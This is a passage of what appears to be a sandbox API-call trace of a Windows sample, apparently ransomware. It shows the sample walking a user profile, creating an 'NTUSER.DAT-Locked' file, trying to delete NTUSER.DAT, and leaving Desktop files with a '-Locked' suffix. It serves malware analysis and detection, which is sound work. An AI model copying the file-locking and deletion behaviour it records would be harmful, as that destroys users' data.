ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0299.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0299.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0299.354] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.354] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x15 [0299.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0299.355] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0299.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0299.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0299.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0299.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0299.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0299.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0299.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0299.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0299.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0299.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0299.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0299.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0299.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0299.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0299.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0299.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0299.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0299.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0299.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0299.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0299.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0299.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0299.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0299.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0299.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0299.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0299.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0299.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0299.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0299.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.363] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.363] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", lpFilePart=0x0) returned 0x27 [0299.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.364] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.365] GetFileType (hFile=0x49c) returned 0x1 [0299.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.365] GetFileType (hFile=0x49c) returned 0x1 [0299.397] CloseHandle (hObject=0x49c) returned 1 [0299.398] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT", lpFilePart=0x0) returned 0x20 [0299.398] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat")) returned 0 [0299.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0299.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0299.404] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0x3291bb98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0x3291bb98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3277d421, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3277d421, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3277d421, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0299.404] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327897d6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327897d6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327897d6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0299.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0299.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327920f7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0299.405] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, 